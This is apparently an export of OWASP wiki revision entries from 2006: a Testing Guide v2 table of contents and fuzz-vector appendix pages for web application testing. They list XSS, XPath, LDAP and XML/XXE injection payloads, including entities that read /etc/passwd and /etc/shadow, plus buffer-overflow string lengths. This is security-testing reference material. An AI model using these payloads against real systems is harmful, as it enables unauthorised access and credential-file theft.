 &amp;lt;nowiki&amp;gt;*)(uid=*))(|(uid=*&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== XPATH Injection ===&lt;br /&gt;
&lt;br /&gt;
For details on XPATH Injection: [[XPath_Injection_Testing_AoC]]&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;'+or+'1'='1&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;'+or+''='&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;x'+or+1=1+or+'x'='y&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;/&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;//&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;//*&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;*/*&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;@*&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;count(/child::node())&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;x'+or+name()='username'+or+'x'='y&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== XML Injection ===&lt;br /&gt;
&lt;br /&gt;
Details on XML Injection here: [[XML_Injection_Testing_AoC]]&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;![CDATA[&amp;lt;script&amp;gt;var n=0;while(true){n++;}&amp;lt;/script&amp;gt;]]&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&amp;lt;foo&amp;gt;&amp;lt;![CDATA[&amp;lt;]]&amp;gt;SCRIPT&amp;lt;![CDATA[&amp;gt;]]&amp;gt;alert('gotcha');&amp;lt;![CDATA[&amp;lt;]]&amp;gt;/SCRIPT&amp;lt;![CDATA[&amp;gt;]]&amp;gt;&amp;lt;/foo&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&amp;lt;foo&amp;gt;&amp;lt;![CDATA[' or 1=1 or ''=']]&amp;gt;&amp;lt;/foof&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&amp;lt;!DOCTYPE foo [&amp;lt;!ELEMENT foo ANY&amp;gt;&amp;lt;!ENTITY xxe SYSTEM &amp;quot;file://c:/boot.ini&amp;quot;&amp;gt;]&amp;gt;&amp;lt;foo&amp;gt;&amp;amp;xee;&amp;lt;/foo&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&amp;lt;!DOCTYPE foo [&amp;lt;!ELEMENT foo ANY&amp;gt;&amp;lt;!ENTITY xxe SYSTEM &amp;quot;file:///etc/passwd&amp;quot;&amp;gt;]&amp;gt;&amp;lt;foo&amp;gt;&amp;amp;xee;&amp;lt;/foo&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&amp;lt;!DOCTYPE foo [&amp;lt;!ELEMENT foo ANY&amp;gt;&amp;lt;!ENTITY xxe SYSTEM &amp;quot;file:///etc/shadow&amp;quot;&amp;gt;]&amp;gt;&amp;lt;foo&amp;gt;&amp;amp;xee;&amp;lt;/foo&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&amp;lt;!DOCTYPE foo [&amp;lt;!ELEMENT foo ANY&amp;gt;&amp;lt;!ENTITY xxe SYSTEM &amp;quot;file:///dev/random&amp;quot;&amp;gt;]&amp;gt;&amp;lt;foo&amp;gt;&amp;amp;xee;&amp;lt;/foo&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
{{Category:OWASP Testing Project AoC}}&lt;/div&gt;</summary>
		<author><name>Subere</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_Testing_Guide_v2_Table_of_Contents&amp;diff=13743</id>
		<title>OWASP Testing Guide v2 Table of Contents</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_Testing_Guide_v2_Table_of_Contents&amp;diff=13743"/>
				<updated>2006-11-27T17:20:46Z</updated>
		
		<summary type="html">&lt;p&gt;Subere: /*  Appendix C: Fuzz Vectors */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Updated 24th Nov, 12.00 GMT+1 &lt;br /&gt;
 Legend:&amp;lt;br&amp;gt;&lt;br /&gt;
 xx%: Progress status of the paragraph &amp;lt;br&amp;gt;&lt;br /&gt;
 Review: the paragraph need a review (Matteo Meucci)&amp;lt;br&amp;gt;&lt;br /&gt;
 TD: Paragraph To Be Assigned&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[http://www.owasp.org/index.php/OWASP_Autumn_of_Code_2006_-_Projects:_Testing_Guide OWASP Testing Guide AoC]]&lt;br /&gt;
&lt;br /&gt;
[[http://www.owasp.org/index.php/OWASP_Testing_Guide_v2_Review_Panel Review Panel]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==[[Testing Guide Frontispiece AoC|Frontispiece]]==&lt;br /&gt;
&lt;br /&gt;
'''1.1 About the OWASP Testing Guide Project'''&amp;lt;br&amp;gt;&lt;br /&gt;
1.1.1 Copyright                                        &amp;lt;br&amp;gt;&lt;br /&gt;
1.1.2 Editors	                                         (0%, Review)&amp;lt;br&amp;gt;&lt;br /&gt;
1.1.3 Authors and Reviewers 	                         (0%, Review)&amp;lt;br&amp;gt;&lt;br /&gt;
1.1.4 Revision History&amp;lt;br&amp;gt;&lt;br /&gt;
1.1.5 Trademarks&amp;lt;br&amp;gt;&lt;br /&gt;
'''1.2 About The Open Web Application Security Project''' &amp;lt;br&amp;gt;&lt;br /&gt;
1.2.1 Overview &amp;lt;br&amp;gt;&lt;br /&gt;
1.2.2 Structure &amp;lt;br&amp;gt;&lt;br /&gt;
1.2.3 Licensing &amp;lt;br&amp;gt;&lt;br /&gt;
1.2.4 Participation and Membership &amp;lt;br&amp;gt;&lt;br /&gt;
1.2.5 Projects &amp;lt;br&amp;gt;&lt;br /&gt;
1.2.6 OWASP Privacy Policy &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==[[Testing Guide Introduction AoC|Introduction]]==&lt;br /&gt;
'''2.1 The OWASP Testing Project'''                                       &amp;lt;br&amp;gt;&lt;br /&gt;
'''2.2 Principles of Testing'''                                           &amp;lt;br&amp;gt;&lt;br /&gt;
'''2.3 Testing Techniques Explained'''                                    &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==[[The OWASP Testing Framework AoC|The OWASP Testing Framework]]==&lt;br /&gt;
'''3.1. Overview'''                                        &amp;lt;br&amp;gt;&lt;br /&gt;
'''3.2. Phase 1 — Before Development Begins '''&amp;lt;br&amp;gt;&lt;br /&gt;
'''3.3. Phase 2: During Definition and Design'''&amp;lt;br&amp;gt;&lt;br /&gt;
'''3.4. Phase 3: During Development'''&amp;lt;br&amp;gt;&lt;br /&gt;
'''3.5. Phase 4: During Deployment'''&amp;lt;br&amp;gt;&lt;br /&gt;
'''3.6. Phase 5: Maintenance and Operations'''&amp;lt;br&amp;gt;&lt;br /&gt;
'''3.7. A Typical SDLC Testing Workflow '''&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==[[Web Application Penetration Testing AoC |Web Application Penetration Testing ]]==&lt;br /&gt;
'''4.1 Introduction and objectives'''	                              (Matteo Meucci)&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''4.2 Information Gathering'''                         (Carlo Pelliccioni)&amp;lt;br&amp;gt;&lt;br /&gt;
4.2.1 Testing Web Application Fingerprint (Antonio Parata)&amp;lt;br&amp;gt;&lt;br /&gt;
4.2.2 Application Discovery (Mauro Bregolin)&amp;lt;br&amp;gt;&lt;br /&gt;
4.2.3 Spidering and googling                         (80%,	Tom Brennan, Tom Ryan)&amp;lt;br&amp;gt;&lt;br /&gt;
4.2.4 Analysis of error codes                         (Carlo Pelliccioni)&amp;lt;br&amp;gt;&lt;br /&gt;
4.2.5 Infrastructure configuration management testing                         &amp;lt;br&amp;gt;&lt;br /&gt;
4.2.5.1 SSL/TLS Testing                         (Mauro Bregolin, Mark Curphey)&amp;lt;br&amp;gt;&lt;br /&gt;
4.2.5.2 DB Listener Testing                         (60%, Eoin Keary, Matteo Meucci)&amp;lt;br&amp;gt;&lt;br /&gt;
4.2.6 Application configuration management testing                         (90%)&amp;lt;br&amp;gt;&lt;br /&gt;
4.2.6.1 File extensions handling                         (Mauro Bregolin)&amp;lt;br&amp;gt;&lt;br /&gt;
4.2.6.2 Old, backup and unreferenced files                         (Mauro Bregolin, Javier Fernandez Sanguino, Dafydd Studdard)&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''4.3 Business logic testing'''                                        (Madhura Halasgikar)&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''4.4 Authentication Testing'''	                                     (Meucci)&amp;lt;br&amp;gt;&lt;br /&gt;
4.4.1 Default or guessable (dictionary) user account              &amp;lt;br&amp;gt;&lt;br /&gt;
4.4.2 Brute Force                                                  (Giorgio Fedon, Andrea Lombardini)&amp;lt;br&amp;gt;&lt;br /&gt;
4.4.3 Bypassing authentication schema                              (Giorgio Fedon, Andrea Lombardini)&amp;lt;br&amp;gt;&lt;br /&gt;
4.4.4 Directory traversal/file include                             (Luca Carettoni)&amp;lt;br&amp;gt;&lt;br /&gt;
4.4.5 Vulnerable remember password and pwd reset                  (Ralph M. Los,Alberto Revelli)&amp;lt;br&amp;gt;&lt;br /&gt;
4.4.6 Logout and Browser Cache Management Testing                                   (Alberto Revelli)&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''4.5 Session Management Testing'''                                        (Glyn Geoghegan, Meucci)&amp;lt;br&amp;gt;&lt;br /&gt;
4.5.1 Analysis of the Session Management Schema (Meucci)&amp;lt;br&amp;gt;&lt;br /&gt;
4.5.2 Cookie and Session token Manipulation  (Alberto Revelli, Matteo Meucci) &amp;lt;br&amp;gt;   &lt;br /&gt;
4.5.3 Exposed session variables	                              (Meucci)&amp;lt;br&amp;gt;&lt;br /&gt;
4.5.4 Session Riding (XSRF)  (Mauro Bregolin,Review)&amp;lt;br&amp;gt;&lt;br /&gt;
4.5.5 HTTP Exploit                                                 (0%, Arian J.Evans)&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''4.6 Data Validation Testing'''                                        (Meucci)		&amp;lt;br&amp;gt;	&lt;br /&gt;
4.6.1 Cross site scripting (80%, Tom Brennan, Tom Ryan) &amp;lt;br&amp;gt;&lt;br /&gt;
4.6.1.1 HTTP Methods and XST (Alberto Revelli) &amp;lt;br&amp;gt;&lt;br /&gt;
4.6.2 SQL Injection (Antonio Parata) &amp;lt;br&amp;gt;&lt;br /&gt;
4.6.2.1 Stored procedure injection (40%,Gary Burns)&amp;lt;br&amp;gt;&lt;br /&gt;
4.6.2.2 Oracle testing (0%,TD) &amp;lt;br&amp;gt;&lt;br /&gt;
4.6.2.3 MySQL testing (Stefano Di Paola) &amp;lt;br&amp;gt;&lt;br /&gt;
4.6.2.4 SQL Server testing (Ariel Waissbein, Laura Nuñez, Alberto Revelli)&amp;lt;br&amp;gt;&lt;br /&gt;
4.6.3 LDAP Injection (Stefano Di Paola) &amp;lt;br&amp;gt; &lt;br /&gt;
4.6.4 ORM Injection (Mark Roxberry) &amp;lt;br&amp;gt;&lt;br /&gt;
4.6.5 XML Injection (Antonio Parata, Stefano Di Paola) &amp;lt;br&amp;gt;&lt;br /&gt;
4.6.6 SSI Injection (Claudio Merloni) &amp;lt;br&amp;gt;&lt;br /&gt;
4.6.7 XPath Injection (Antonio Parata, Alberto Revelli, Stefano Di Paola) &amp;lt;br&amp;gt;&lt;br /&gt;
4.6.8 IMAP/SMTP Injection (Vicente Aguilera) &amp;lt;br&amp;gt;&lt;br /&gt;
4.6.9 Code Injection (100%, Mark Roxberry) &amp;lt;br&amp;gt;&lt;br /&gt;
4.6.10 OS Commanding (70%, Gary Burns) &amp;lt;br&amp;gt;&lt;br /&gt;
4.6.11 Buffer overflow Testing &amp;lt;br&amp;gt;&lt;br /&gt;
4.6.11.1 Heap overflow &amp;lt;br&amp;gt;&lt;br /&gt;
4.6.11.2 Stack overflow &amp;lt;br&amp;gt;&lt;br /&gt;
4.6.11.3 Format string &amp;lt;br&amp;gt;&lt;br /&gt;
4.6.12 Incubated vulnerability testing (95%,Ariel Waissbein, Laura Nuñez) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''4.7 Denial of Service Testing'''                                           &amp;lt;br&amp;gt;&lt;br /&gt;
4.7.1 Locking Customer Accounts          Review&amp;lt;br&amp;gt;&lt;br /&gt;
4.7.2 Buffer Overflows                                           	&amp;lt;br&amp;gt;	&lt;br /&gt;
4.7.3 User Specified Object Allocation                           &amp;lt;br&amp;gt;		&lt;br /&gt;
4.7.4 User Input as a Loop Counter                               &amp;lt;br&amp;gt;&lt;br /&gt;
4.7.5 Writing User Provided Data to Disk                        &amp;lt;br&amp;gt;&lt;br /&gt;
4.7.6 Failure to Release Resources                              &amp;lt;br&amp;gt;&lt;br /&gt;
4.7.7 Storing too Much Data in Session                          &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''4.8 Web Services Testing''' (Eoin Keary, Mark Roxberry)&amp;lt;br&amp;gt;&lt;br /&gt;
4.8.1 XML Structural Testing &amp;lt;br&amp;gt;&lt;br /&gt;
4.8.2 XML content-level Testing &amp;lt;br&amp;gt;&lt;br /&gt;
4.8.3 HTTP GET parameters/REST Testing &amp;lt;br&amp;gt;&lt;br /&gt;
4.8.4 Naughty SOAP attachments	&amp;lt;br&amp;gt;&lt;br /&gt;
4.8.5 Replay Testing       &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''4.9 AJAX Testing'''    (70%, Dan Cornell, Giorgio Fedon, Stefano Di Paola)&amp;lt;br&amp;gt;&lt;br /&gt;
4.9.1 Vulnerabilities (90%, Anush Shetty) &amp;lt;br&amp;gt;&lt;br /&gt;
4.9.2  How to test (60%)&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==[[Writing Reports: value the real risk AoC |Writing Reports: value the real risk ]]==&lt;br /&gt;
'''5.1 How to value the real risk'''	                              (90%, Daniel Cuthbert, Matteo Meucci, Sebastien Deleersnyder, Marco Morana)&amp;lt;br&amp;gt;&lt;br /&gt;
'''5.2 How to write the report of the testing'''	                      (20%, Daniel Cuthbert, Tom Brennan, Tom Ryan)	TD&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==[[Appendix A: Testing Tools |Appendix A: Testing Tools ]]==&lt;br /&gt;
(90%)&amp;lt;br&amp;gt;&lt;br /&gt;
* Black Box Testing Tools&lt;br /&gt;
* Source Code Analyzers&lt;br /&gt;
* Other Tools&lt;br /&gt;
&lt;br /&gt;
==[[OWASP Testing Guide Appendix B: Suggested Reading | Appendix B: Suggested Reading]]==&lt;br /&gt;
(70%)&amp;lt;br&amp;gt;&lt;br /&gt;
* Whitepapers&amp;lt;br&amp;gt;&lt;br /&gt;
* Books&amp;lt;br&amp;gt;&lt;br /&gt;
* Articles&amp;lt;br&amp;gt;&lt;br /&gt;
* Useful Websites&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==[[OWASP Testing Guide Appendix C: Fuzz Vectors | Appendix C: Fuzz Vectors]]==&lt;br /&gt;
(80%)&lt;br /&gt;
&lt;br /&gt;
* Fuzz Categories&lt;br /&gt;
** Recursive fuzzing&lt;br /&gt;
** Replasive fuzzing&lt;br /&gt;
* Cross Site Scripting (XSS)&lt;br /&gt;
* Buffer Overflows and Format String Errors&lt;br /&gt;
** Buffer Overflows (BFO)&lt;br /&gt;
** Format String Errors (FSE)&lt;br /&gt;
** Integer Overflows (INT)&lt;br /&gt;
* SQL Injection&lt;br /&gt;
** Passive SQL Injection (SQP)&lt;br /&gt;
** Active SQL Injection (SQI)&lt;br /&gt;
* LDAP Injection&lt;br /&gt;
* XPATH Injection&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{{Category:OWASP Testing Project AoC}}&lt;/div&gt;</summary>
		<author><name>Subere</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_Testing_Guide_Appendix_C:_Fuzz_Vectors&amp;diff=13742</id>
		<title>OWASP Testing Guide Appendix C: Fuzz Vectors</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_Testing_Guide_Appendix_C:_Fuzz_Vectors&amp;diff=13742"/>
				<updated>2006-11-27T17:18:26Z</updated>
		
		<summary type="html">&lt;p&gt;Subere: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&amp;lt;br&amp;gt;&lt;br /&gt;
{{Template:OWASP Testing Guide v2}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The following are fuzzing vectors which can be used with webscarab, jbrofuzz or another fuzzer.&lt;br /&gt;
Fuzzing is the &amp;quot;kitchen sink&amp;quot; approach to testing the response of an application to parameter manipulation. Generally one looks for error conditions that are generated in an application as a result of fuzzing.&lt;br /&gt;
This is the simple part of the discovery phase.&lt;br /&gt;
Once an error has been discovered identifying and exploiting a potential vulnerability is where skill is required.&lt;br /&gt;
&lt;br /&gt;
=== Fuzz Categories ===&lt;br /&gt;
&lt;br /&gt;
In the case of stateless network protocol fuzzing (like HTTP(S)) two broad categories exist:&lt;br /&gt;
&lt;br /&gt;
* Recursive fuzzing&lt;br /&gt;
* Replasive fuzzing&lt;br /&gt;
&lt;br /&gt;
We examine and define each category in the sub-sections that follow. &lt;br /&gt;
&lt;br /&gt;
==== Recursive fuzzing ====&lt;br /&gt;
&lt;br /&gt;
Recursive fuzzing can be defined as the process of fuzzing a part of a request by iterating through all the possible combinations of a set alphabet. Consider the case of:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/8302fa3b&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Selecting &amp;quot;8302fa3b&amp;quot; as a part of the request to be fuzzed against the set hexadecimal alphabet i.e. {0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f} falls under the category of recursive fuzzing. This would generate a total of 16^8 requests of the form:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/00000000&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;...&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/11000fff&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;...&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/ffffffff&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Replasive fuzzing ====&lt;br /&gt;
&lt;br /&gt;
Replasive fuzzing can be defined as the process of fuzzing part of a request by means of replacing it with a set value. This value is known as a fuzz vector. In the case of:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/8302fa3b&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Testing against Cross Site Scripting (XSS) by sending the following fuzz vectors: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/&amp;gt;&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert(&amp;quot;XSS&amp;quot;)&amp;lt;/script&amp;gt;&amp;amp;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/'';!--&amp;quot;&amp;lt;XSS&amp;gt;=&amp;amp;{()}&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This is a form of replasive fuzzing. In this category, the total number of requests is dependant on the number of fuzz vectors specified. &lt;br /&gt;
&lt;br /&gt;
The remainder of this appendix presents a number of fuzz vector categories.&lt;br /&gt;
&lt;br /&gt;
=== Cross Site Scripting (XSS) ===&lt;br /&gt;
&lt;br /&gt;
Brief description here.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;gt;&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert(&amp;quot;XSS&amp;quot;)&amp;lt;/script&amp;gt;&amp;amp;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;quot;&amp;gt;&amp;lt;STYLE&amp;gt;@import&amp;quot;javascript:alert('XSS')&amp;quot;;&amp;lt;/STYLE&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;gt;&amp;quot;'&amp;gt;&amp;lt;img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;gt;%22%27&amp;gt;&amp;lt;img%20src%3d%22javascript:alert(%27%20XSS%27)%22&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;quot;&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;gt;&amp;quot;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'';!--&amp;quot;&amp;lt;XSS&amp;gt;=&amp;amp;{()}&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=&amp;quot;javascript:alert('XSS');&amp;quot;&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=javascript:alert('XSS')&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=JaVaScRiPt:alert('XSS')&amp;gt; &amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=JaVaScRiPt:alert(&amp;amp;amp;quot;XSS&amp;lt;WBR&amp;gt;&amp;amp;amp;quot;)&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=&amp;amp;amp;#106;&amp;amp;amp;#97;&amp;amp;amp;#118;&amp;amp;amp;#97;&amp;amp;amp;&amp;lt;WBR&amp;gt;#115;&amp;amp;amp;#99;&amp;amp;amp;#114;&amp;amp;amp;#105;&amp;amp;amp;#112;&amp;amp;amp;&amp;lt;WBR&amp;gt;#116;&amp;amp;amp;#58;&amp;amp;amp;#97;&amp;amp;amp;#108;&amp;amp;amp;#101;&amp;amp;amp;&amp;lt;WBR&amp;gt;#114;&amp;amp;amp;#116;&amp;amp;amp;#40;&amp;amp;amp;#39;&amp;amp;amp;#88;&amp;amp;amp;#83&amp;lt;WBR&amp;gt;;&amp;amp;amp;#83;&amp;amp;amp;#39;&amp;amp;amp;#41&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG&lt;br /&gt;
SRC=&amp;amp;#0000106&amp;amp;#0000097&amp;amp;&amp;lt;WBR&amp;gt;#0000118&amp;amp;#0000097&amp;amp;#0000115&amp;amp;&amp;lt;WBR&amp;gt;#0000099&amp;amp;#0000114&amp;amp;#0000105&amp;amp;&amp;lt;WBR&amp;gt;#0000112&amp;amp;#0000116&amp;amp;#0000058&amp;amp;&amp;lt;WBR&amp;gt;#0000097&amp;amp;#0000108&amp;amp;#0000101&amp;amp;&amp;lt;WBR&amp;gt;#0000114&amp;amp;#0000116&amp;amp;#0000040&amp;amp;&amp;lt;WBR&amp;gt;#0000039&amp;amp;#0000088&amp;amp;#0000083&amp;amp;&amp;lt;WBR&amp;gt;#0000083&amp;amp;#0000039&amp;amp;#0000041&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=&amp;amp;#x6A&amp;amp;#x61&amp;amp;#x76&amp;amp;#x61&amp;amp;#x73&amp;amp;&amp;lt;WBR&amp;gt;#x63&amp;amp;#x72&amp;amp;#x69&amp;amp;#x70&amp;amp;#x74&amp;amp;#x3A&amp;amp;&amp;lt;WBR&amp;gt;#x61&amp;amp;#x6C&amp;amp;#x65&amp;amp;#x72&amp;amp;#x74&amp;amp;#x28&amp;amp;&amp;lt;WBR&amp;gt;#x27&amp;amp;#x58&amp;amp;#x53&amp;amp;#x53&amp;amp;#x27&amp;amp;#x29&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=&amp;quot;jav&amp;amp;amp;#x09;ascript:alert(&amp;lt;WBR&amp;gt;'XSS');&amp;quot;&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=&amp;quot;jav&amp;amp;amp;#x0A;ascript:alert(&amp;lt;WBR&amp;gt;'XSS');&amp;quot;&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=&amp;quot;jav&amp;amp;amp;#x0D;ascript:alert(&amp;lt;WBR&amp;gt;'XSS');&amp;quot;&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Buffer Overflows and Format String Errors ===&lt;br /&gt;
&lt;br /&gt;
Brief overview of category here.&lt;br /&gt;
&lt;br /&gt;
==== Buffer Overflows (BFO) ====&lt;br /&gt;
&lt;br /&gt;
Brief description here. &lt;br /&gt;
&lt;br /&gt;
Note that attempting to load such a definition file within a fuzzer application can potentially cause the application to crash.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 5&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 17&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 33&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 65&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 129&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 257&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 513&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
